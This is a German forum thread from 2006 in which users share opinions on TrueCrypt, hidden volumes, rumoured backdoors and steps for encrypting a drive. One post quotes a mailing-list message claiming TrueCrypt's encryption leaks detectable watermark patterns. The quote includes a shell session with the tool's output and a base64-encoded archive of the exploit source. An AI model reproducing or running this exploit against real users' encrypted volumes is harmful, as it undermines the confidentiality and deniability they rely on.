Vollständige Version anzeigen : Truecrypt


Tankred
09.01.2006, 19:17

Mich würde interessieren, was ihr von der Opensource Truecrypt haltet.
Besser oder schlechter als kostenpflichtige Software?
Vor allem die Sicherheitaspekte: AES-Twowish-Serpent dürfte nicht knackbar sein, es sei denn es gibt Schwächen in der Software_.

Benutzt jemand die Möglichkeit der Hidden Volumes? (Für die dies nicht kennen: Die Möglichkeit in einem verschlüsselten Volume ein weiteres zu erzeugen, in dem ihr relevante Daten speichert. Wenn ihr gezwungen seit das PW zu verraten, gebt ihr das zum äußeren Volume an wo nur wenig wichtige dinge sind)

Meinungen?

d0p3.c4k3
09.01.2006, 21:26

m0insen,

Truecrypt ist ne feine sache! kann ich nur empfehlen. hatte vorher auch andere themenverwandte programme versucht, muss aber sagen, truecrypt ist einfach und zuverlässig. bietet darüberhinaus ausreichend schutz! und sticht somit die anderen kandidaten aus!
außerdem wird überall gesagt, die amerikanischen anbieter hätten in ihrern progz backdoors eingebaut! das macht die sache natürlich heikel. obs nun stimmt oder nicht, kann ich leider nicht sagen, wird halt überall erzählt.
hidden volume benutze ich auch. funktioniert ohne probleme, außerdem kannste dein verschlüsseltes volume auch auf ne cd oder dvd brennen!
mfg d0p3_c4k3

viper
10.01.2006, 14:24

Ähnliche Themen: Ubuntu + Truecrypt - Failed to load truecrypt kernel module Hi. Hab mir gestern das erste mal n Ubuntu auf mein Laptop gehauen, wollte TrueCrypt natürlich weiterbenutzen, aber dann kam folgende Fehl[...]
TrueCrypt-Problem -> Truecrypt Sammelthread / V6.x released Hi, hab folgendes Problem. Ich hatte zu Beginn 2 Partitionen und das gesamte System verschlüsselt mittels True Crypt. Plötzlich konnte ic[...]
Truecrypt
Jop, TrueCrypt verwende ich auch, weil es einfacher ist als z_B. Programme wie Steganos, DriveCrypt, etc. und es nicht soviele bzw. kaum Systemressourcen frisst. Die Bedienung ist auch für Anfänger gedacht und die Verschlüsselung scheint auch ganz sicher zu sein.

Also, alles in allem für mich ein perfektes Programm, das ich in Zukunft auch weiter verwenden werde ;)

Pustekuchen
10.01.2006, 14:42

Ich wollte es auch mal ausprobieren bin aber noch nicht dazu gekommen.

Da ihr euch ja damit auszukenn scheint noch eine frage muss ich dann immer wenn ich ein Film oder so anschauen will den schlüsel eigeben?

Und kann ich das auch nachträglich machen wenn meine Festplatte schon relativ voll ist oder muss sie am anfang lee sein um so eine partion oder was das ist zu erzeugen?


MFG oLFi

weixi2
10.01.2006, 14:50

Original von d0p3_c4k3
m0insen,

Truecrypt ist ne feine sache! kann ich nur empfehlen. hatte vorher auch andere themenverwandte programme versucht, muss aber sagen, truecrypt ist einfach und zuverlässig. bietet darüberhinaus ausreichend schutz! und sticht somit die anderen kandidaten aus!
außerdem wird überall gesagt, die amerikanischen anbieter hätten in ihrern progz backdoors eingebaut! das macht die sache natürlich heikel. obs nun stimmt oder nicht, kann ich leider nicht sagen, wird halt überall erzählt.
hidden volume benutze ich auch. funktioniert ohne probleme, außerdem kannste dein verschlüsseltes volume auch auf ne cd oder dvd brennen!
mfg d0p3_c4k3

afair müssen doch nur kommerzielle Verschlüsselungs-Produkte Backdoors eingebaut haben_.
Oder gilt das auch für Freeware?


Ansonsten isses ein Super Prog, vor allem in der neuen version

Tankred
10.01.2006, 15:26

Komm. kann Backdoors haben,
Freeware wenns closed source ist auch,
aber bei OS kannst du ja den Code nach backdoors durchsuchen wenn du willst.

Olfi: wenn das volume gemounted ist bleibt es auch gemounted, ausser du meldest dich ab, gehst in power safe mode (standby, hibernate) oder nach einer bestimmten unbenutzten Zeit. Ist aber abstellbar. Bei Shutdown auf jeden fall.

Du musst ein neues Volume erzeugen, welches entweder eine komplette Partition oder eine Datei (Cryptocontainer) ist. Dann kannst du deine Daten darin ablegen.

ausserdem kann die PArtition wo das OS drauf ist nicht verschlüsselt werden (sollte aber klar sein)

amigo
10.01.2006, 15:44

ich benutze TrueCrypt auch_.. Aber ohne Device im Device oder sowas_.. einfach ganz normal die Festplatte damit verschlüsselt (Twofish)

Halloweenracer
10.01.2006, 17:26

hiho,

also ich habe gehört, dass das prog kein masterkey hat, deswegen wollte ich es nutzen_.. aber ich bekomme es nich hin, dass ich die ganze hd verschlüsselt hab_..

also wenn man die hd in nen andern pc baut, dass da dann die daten nich mehr ohne das pw lesbar sind_.. sowas will ich machen, aber ich bekomms net hin_..

also wer mir helfen will, dem danke ich schonmal sehr!

mfg racer

Kaptain27
10.01.2006, 20:16

Nabend

Ich benutze seit neusten auch TrueCrypt und habe mich sehr schnell an das Programm gewöhnt. Ob das Programm Backdoors hat ist mir auch net klar. Kann es aber nur weiter emphelen da es sehr einfach zu bedienen ist.

Mfg Kaptain27

Tankred
10.01.2006, 20:32

Original von Halloweenracer
hiho,

also ich habe gehört, dass das prog kein masterkey hat, deswegen wollte ich es nutzen_.. aber ich bekomme es nich hin, dass ich die ganze hd verschlüsselt hab_..

also wenn man die hd in nen andern pc baut, dass da dann die daten nich mehr ohne das pw lesbar sind_.. sowas will ich machen, aber ich bekomms net hin_..

also wer mir helfen will, dem danke ich schonmal sehr!

mfg racer

Du kannst eine HDD insofern nur verschlüsseln, wenn du eine Partition erstellst, wo das OS draufkommt. Diese kann nicht verschlüsselt werden. Die zweite formatierst du nichtmit einem Dateisystem, sondern lässt sie leer und in der Größe in der du sie haben willst. Dann benutzt du den Volume Creation Wizard und erstellst dein Volume. Das kannst du dann in Truecrypt mounten.

Wenn du ne externe komplett verschlüsseln willst:
-Schiebe alle daten auf deine interne HDD.
-Lösche die externe komplett. Erstelle eine neue Partition (meist in maximaler Größe)
-Erstelle mit dem Volume Creation Wizard dein Volume. Wähle das richtige Device aus.
-Wenn ferrtig, mounten und daten drauf.
In den händen von jemanden ohne Truecrypt & Key ist diese Platte dann voll mit datenschrott_..

Denim
11.01.2006, 19:46

So leute =)
hab das in einen anderen forum (vor längerer zeit^^) gefunden_._._.

bildet euch jetzt mal ne meinung über das tool 8)





Re: gonzo cryptography; how would you improve existing cryptosystems?
Thu, 17 Nov 2005 06:28:17 -0800

Thomas Sjögren wrote:
> On Tue, Nov 08, 2005 at 05:58:04AM -0600, Travis H. wrote:
> > The only thing close that I've seen is Bestcrypt, which is commercial
> > and has a Linux and Windows port. I don't recall if the Linux port
> > came with source or not.
>
> __-truecrypt-org/
>
> "TrueCrypt
> Free open-source disk encryption software for Windows XP/2000/2003 and Linux

Unfortunately truecrypt is just another broken device crypto implementation
that uses good ciphers in insecure way. Specially crafted static bit
patterns are easily detectable through that kind of bad crypto.
Requirements: (1) used ciphers must have 128-bit block size and (2) file
system where bit patterns are stored must have 2K or larger soft block size.
Many popular linux file systems meet those requirements. Uuencoded exploit
source code is included in this email.

# truecrypt --device-number 0 --filesystem ext2 /tmp/container1-tc /mnt
Enter password for '/tmp/container1-tc':
# mount | grep /mnt
/dev/mapper/truecrypt0 on /mnt type ext2 (rw)
# tune2fs -l /dev/mapper/truecrypt0 | grep "Block size"
Block size: 4096
# _/create-watermark-encodings-truecrypt 10:44 11:55 12:66 666:77 >/mnt/foo1
# truecrypt -d /mnt
# truecrypt -l
truecrypt: Kernel module not loaded
# _/detect-watermark-encodings-truecrypt </tmp/container1-tc
5241344 bytes scanned
watermark encoding 10, count 44
watermark encoding 11, count 55
watermark encoding 12, count 66
watermark encoding 666, count 77
# uname -s -r
Linux 2_6_14_2
# truecrypt --version | head -n 1
truecrypt 4_0

--
Jari Ruusu 1024R/3A220F51 5B 4B F9 BB D3 3F 52 E9 DB 1D EB E3 24 0E A9 DD

Code:

begin-base64 644 watermark-exploits-tar-bz2
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
gDAIwDmCXD7iGMAohQKlqKP/xdyRThQkOuNme8A=
====



raid-rush.ws | Imprint & Contact pr